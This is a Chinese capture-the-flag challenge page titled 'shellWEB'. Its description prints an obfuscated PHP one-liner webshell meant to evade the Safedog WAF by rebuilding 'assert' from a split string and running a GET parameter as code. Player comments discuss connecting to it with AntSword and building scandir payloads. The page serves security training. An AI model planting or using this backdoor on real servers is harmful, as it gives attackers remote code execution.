shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 5483
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
三分踯躅 3年前

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

GGBond9527 3年前

assert()代码执行漏洞

回复 1

xiaotan451 3年前

我是肖彪

回复 3
xiaotan451 3年前

@biaoxiao 我是流汗了

回复 0

biaoxiao 3年前

嗯 你说得对

回复 0

kaibaking 3年前

兄弟们,为什么我蚁剑连接数据为空,/index.php 连接密码s ?? 还是说不需要连接蚁剑?

回复 0
som3bady 3年前

他要求是get

回复 0

tzzzez 4年前

payload构建,蚁剑连接

回复 0
Retro 3年前

@ypp110 蚁剑似乎不能用get连,直接url里输吧

回复 0

ypp110 3年前

能否详细说下怎么用蚁剑连接

回复 1

哇哦~ 4年前

学到就是赚到

回复 0

丶我亚索贼六 4年前

它就是个马,s构造访问就行

回复 1

lm459532915 4年前

构造 scandir

回复 1

tobyshawn 4年前

我还以为过狗一句话是新年礼物,看都没看。。。

回复 0
烟花不易冷 3年前

求教大佬,过狗一句话啥意思?

回复 0

Taer 4年前

dir之后直接在浏览器访问txt文件

回复 2
0neday 3年前

可恶 我还在想 type 这个文件

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

Ta7suya 攻破了该题 29分钟前
kfdwty 攻破了该题 18小时前
z791458703 攻破了该题 1天前
1720713439 攻破了该题 1天前
ct1640 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
15137086876 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
请她喝一杯 攻破了该题 3天前
haha888 攻破了该题 4天前
2046185809 攻破了该题 4天前
gaohaofeng 攻破了该题 4天前
hulihaha 攻破了该题 4天前
hyukoh 攻破了该题 4天前
yuminna 攻破了该题 4天前
lindaxu 攻破了该题 4天前
问题反馈